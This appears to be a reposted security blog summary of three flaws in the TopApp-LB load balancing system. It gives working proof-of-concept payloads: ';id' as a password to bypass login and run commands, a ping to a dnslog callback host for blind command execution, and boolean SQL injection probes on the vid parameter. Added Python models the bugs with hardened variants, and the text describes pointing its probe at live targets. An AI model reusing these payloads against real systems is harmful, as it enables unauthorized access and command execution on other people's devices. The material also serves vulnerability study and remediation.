0x00 Vulnerability description
1. TopApp-LB load balancing system: authentication bypass (login without a valid password)
2. TopApp-LB load balancing system: command execution
3. TopApp-LB load balancing system: SQL injection
0x01 Vulnerability reproduction
1. PoC: any username, password: ;id. The login succeeds without a valid password: the password value reaches a shell, the ; ends the intended command and id runs as a second command.
2. PoC: ; ping xxx.dnslog.info; echo. A DNS query for the dnslog domain appears in the DNSLog panel, confirming blind command execution out of band (the trailing ; echo keeps the command line valid whatever the application appends after the injection point).
3.1. Capture the request to the affected page.
3.2. Append a single quote to the vid parameter; the application returns a database error.
3.3. Send or 1=1 and or 1=2 in vid; the two responses differ, which confirms an injection point (boolean-based blind injection).
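The following is an added example, not code from the original post and not TopApp-LB's own code, which the author does not publish. It models the two bug classes reproduced above with hypothetical stand-ins: a login helper that splices the password into a shell command line (the assumed cause of step 1, since ;id works as a password), a vid lookup that concatenates the parameter into SQL, and a probe that replays steps 3.2 and 3.3 against it. The table, rows and all function names are constructed for this illustration; the hardened variants beside each flaw show what removes the injection.

```python
"""Offline model of the two bug classes reproduced above (command injection
through the login form, boolean-based blind SQL injection in vid).

Everything here is a hypothetical stand-in written for illustration: the
real TopApp-LB handlers are not available and no code is taken from them.
"""
import sqlite3
import subprocess


# --- Steps 1 and 2: the password value reaches a shell ---------------------

def vulnerable_login(user: str, password: str) -> str:
    # Assumption: the credentials are spliced into a shell command line.
    # With password ';id' the shell ends the intended command at ';' and
    # runs 'id' as a second command, so the output below contains 'uid='.
    cmd = f"echo checking {user} {password}"
    return subprocess.run(cmd, shell=True, capture_output=True,
                          text=True).stdout


def hardened_login(user: str, password: str) -> str:
    # No shell: each argument is passed verbatim, so ';id' is just text.
    return subprocess.run(["echo", "checking", user, password],
                          capture_output=True, text=True).stdout


def command_injected(output: str) -> bool:
    # The ';id' PoC succeeded if id's output is visible in the response.
    return "uid=" in output


# --- Step 3: boolean-based blind SQL injection in the vid parameter --------

def make_db() -> sqlite3.Connection:
    # Constructed sample data, not taken from any real TopApp-LB install.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE vservers (vid INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO vservers VALUES (?, ?)",
                   [(1, "vs-web"), (2, "vs-api"), (3, "vs-admin")])
    return db


def vulnerable_lookup(db: sqlite3.Connection, vid: str) -> list:
    # Assumption: vid is concatenated straight into the SQL text.
    return db.execute(f"SELECT name FROM vservers WHERE vid = {vid}").fetchall()


def parameterized_lookup(db: sqlite3.Connection, vid: str) -> list:
    # Bound parameter: the whole string is compared as one value, so
    # "1 or 1=1" matches nothing and "1'" raises no error.
    return db.execute("SELECT name FROM vservers WHERE vid = ?", (vid,)).fetchall()


def probe(lookup, db, vid: str):
    """Send one value and classify the reply, like reading the HTTP response:
    ('error', message) for a database error, ('ok', rows) otherwise."""
    try:
        return ("ok", lookup(db, vid))
    except sqlite3.Error as exc:
        return ("error", str(exc))


def looks_injectable(lookup, db, base: str = "1") -> dict:
    """Replay steps 3.2 and 3.3: quote probe, then the 1=1 / 1=2 pair."""
    quote_status, _ = probe(lookup, db, base + "'")                 # step 3.2
    true_status, true_rows = probe(lookup, db, f"{base} or 1=1")    # step 3.3
    false_status, false_rows = probe(lookup, db, f"{base} or 1=2")
    return {
        "quote_error": quote_status == "error",
        "boolean_blind": (true_status == "ok" and false_status == "ok"
                          and true_rows != false_rows),
    }


if __name__ == "__main__":
    print("';id' on shell login:   ", command_injected(vulnerable_login("admin", ";id")))
    print("';id' on no-shell login:", command_injected(hardened_login("admin", ";id")))
    db = make_db()
    print("concatenated vid:", looks_injectable(vulnerable_lookup, db))
    print("bound vid:       ", looks_injectable(parameterized_lookup, db))
```

The same looks_injectable logic applies to a live target by swapping the lookup for an HTTP request and classifying the response body, which is what the manual steps above do by eye; the 1=1 / 1=2 pair is only meaningful when both requests return without an error and the two bodies differ, otherwise the difference may be the error page itself.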
Source (please credit when reposting): Adminxe's Blog » TopApp-LB Load Balancing System Vulnerability Summary